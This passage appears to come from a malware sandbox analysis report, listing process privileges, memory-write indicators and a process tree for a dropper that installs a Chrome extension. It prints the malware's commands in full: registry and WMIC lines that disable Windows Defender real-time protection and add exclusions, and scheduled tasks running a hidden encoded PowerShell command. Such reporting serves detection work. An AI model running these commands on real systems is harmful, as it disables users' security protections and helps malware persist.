WMIC.exe Token: SeManageVolumePrivilege 1656 WMIC.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1548 WMIC.exe Token: SeIncreaseQuotaPrivilege 1548 WMIC.exe Token: SeSecurityPrivilege 1548 WMIC.exe Token: SeTakeOwnershipPrivilege 1548 WMIC.exe Token: SeLoadDriverPrivilege 1548 WMIC.exe Token: SeSystemtimePrivilege 1548 WMIC.exe Token: SeBackupPrivilege 1548 WMIC.exe Token: SeRestorePrivilege 1548 WMIC.exe Token: SeShutdownPrivilege 1548 WMIC.exe Token: SeSystemEnvironmentPrivilege 1548 WMIC.exe Token: SeUndockPrivilege 1548 WMIC.exe Token: SeManageVolumePrivilege 1548 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2980 wrote to memory of 300 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 28 PID 2980 wrote to memory of 300 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 28 PID 2980 wrote to memory of 300 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 28 PID 2980 wrote to memory of 300 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 28 PID 2980 wrote to memory of 300 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 28 PID 2980 wrote to memory of 300 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 28 PID 2980 wrote to memory of 300 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 28 PID 300 wrote to memory of 3056 300 Install.exe 29 PID 300 wrote to memory of 3056 300 Install.exe 29 PID 300 wrote to memory of 3056 300 Install.exe 29 PID 300 wrote to memory of 3056 300 Install.exe 29 PID 300 wrote to memory of 3056 300 Install.exe 29 PID 300 wrote to memory of 3056 300 Install.exe 29 PID 300 wrote to memory of 3056 300 Install.exe 29 PID 3056 wrote to memory of 1832 3056 Install.exe 31 PID 3056 wrote to memory of 1832 3056 Install.exe 31 PID 3056 wrote to memory of 1832 3056 Install.exe 31 PID 3056 wrote to memory of 1832 3056 Install.exe 31 PID 3056 wrote to memory of 1832 3056 Install.exe 31 PID 3056 wrote to memory of 1832 3056 Install.exe 31 PID 3056 wrote to memory of 1832 3056 Install.exe 31 PID 1832 wrote to memory of 1752 1832 forfiles.exe 33 PID 1832 wrote to memory of 1752 1832 forfiles.exe 33 PID 1832 wrote to memory of 1752 1832 forfiles.exe 33 PID 1832 wrote to memory of 1752 1832 forfiles.exe 33 PID 1832 wrote to memory of 1752 1832 forfiles.exe 33 PID 1832 wrote to memory of 1752 1832 forfiles.exe 33 PID 1832 wrote to memory of 1752 1832 forfiles.exe 33 PID 1752 wrote to memory of 2728 1752 cmd.exe 34 PID 1752 wrote to memory of 2728 1752 cmd.exe 34 PID 1752 wrote to memory of 2728 1752 cmd.exe 34 PID 1752 wrote to memory of 2728 1752 cmd.exe 34 PID 1752 wrote to memory of 2728 1752 cmd.exe 34 PID 1752 wrote to memory of 2728 1752 cmd.exe 34 PID 1752 wrote to memory of 2728 1752 cmd.exe 34 PID 2728 wrote to memory of 2632 2728 powershell.exe 35 PID 2728 wrote to memory of 2632 2728 powershell.exe 35 PID 2728 wrote to memory of 2632 2728 powershell.exe 35 PID 2728 wrote to memory of 2632 2728 powershell.exe 35 PID 2728 wrote to memory of 2632 2728 powershell.exe 35 PID 2728 wrote to memory of 2632 2728 powershell.exe 35 PID 2728 wrote to memory of 2632 2728 powershell.exe 35 PID 3056 wrote to memory of 1756 3056 Install.exe 36 PID 3056 wrote to memory of 1756 3056 Install.exe 36 PID 3056 wrote to memory of 1756 3056 Install.exe 36 PID 3056 wrote to memory of 1756 3056 Install.exe 36 PID 3056 wrote to memory of 1756 3056 Install.exe 36 PID 3056 wrote to memory of 1756 3056 Install.exe 36 PID 3056 wrote to memory of 1756 3056 Install.exe 36 PID 1672 wrote to memory of 1684 1672 taskeng.exe 41 PID 1672 wrote to memory of 1684 1672 taskeng.exe 41 PID 1672 wrote to memory of 1684 1672 taskeng.exe 41 PID 1672 wrote to memory of 1684 1672 taskeng.exe 41 PID 1684 wrote to memory of 2068 1684 cbFljeS.exe 42 PID 1684 wrote to memory of 2068 1684 cbFljeS.exe 42 PID 1684 wrote to memory of 2068 1684 cbFljeS.exe 42 PID 1684 wrote to memory of 2068 1684 cbFljeS.exe 42 PID 1684 wrote to memory of 1748 1684 cbFljeS.exe 44 PID 1684 wrote to memory of 1748 1684 cbFljeS.exe 44 PID 1684 wrote to memory of 1748 1684 cbFljeS.exe 44 PID 1684 wrote to memory of 1748 1684 cbFljeS.exe 44 PID 1972 wrote to memory of 2956 1972 taskeng.exe 47 PID 1972 wrote to memory of 2956 1972 taskeng.exe 47 PID 1972 wrote to memory of 2956 1972 taskeng.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe"C:\Users\Admin\AppData\Local\Temp\10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\7zS1536.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:300 -
C:\Users\Admin\AppData\Local\Temp\7zS1748.tmp\Install.exe.\Install.exe /LRcdRdidhE "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bsqNJSiTyoMLfdbIdy" /SC once /ST 22:33:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\cbFljeS.exe\" 2Z /pVhdidkiM 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:2952
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {12E32273-BE7A-4843-AFA1-0A36F4594A46} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\cbFljeS.exeC:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\cbFljeS.exe 2Z /pVhdidkiM 385137 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gULQLywNe" /SC once /ST 01:40:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gULQLywNe"3⤵PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gULQLywNe"3⤵PID:408
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1348
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1888
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:540
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMNXdmbhe" /SC once /ST 04:06:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMNXdmbhe"3⤵PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMNXdmbhe"3⤵PID:1276
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2612
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1884
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:323⤵PID:2724
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:643⤵PID:2516
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:323⤵PID:2632
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵PID:2656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:643⤵PID:2568
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵PID:2752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\sFyaDrJXZzAeWCdu\rdvKBuDl\DRyIBDXNfAXlymWW.wsf"3⤵PID:2856
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\sFyaDrJXZzAeWCdu\rdvKBuDl\DRyIBDXNfAXlymWW.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2596 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:324⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:644⤵PID:380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:324⤵PID:2948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:644⤵PID:3060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:324⤵PID:320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:644⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:324⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:644⤵PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:324⤵PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:644⤵PID:1344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:324⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:644⤵PID:1864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:324⤵PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:644⤵PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵PID:892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵PID:2440
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsAKBYLZy" /SC once /ST 06:36:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsAKBYLZy"3⤵PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsAKBYLZy"3⤵PID:2736
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2772
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2776
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2656
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KdMGsZYUagVlNoZLt" /SC once /ST 14:39:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\PpZzsTE.exe\" WB /tqfRdidxm 385137 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "KdMGsZYUagVlNoZLt"3⤵PID:2728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 4843⤵
- Loads dropped DLL
- Program crash
PID:2688
-
-
-
C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\PpZzsTE.exeC:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\PpZzsTE.exe WB /tqfRdidxm 385137 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1292 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bsqNJSiTyoMLfdbIdy"3⤵PID:2560
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:808
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1640
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
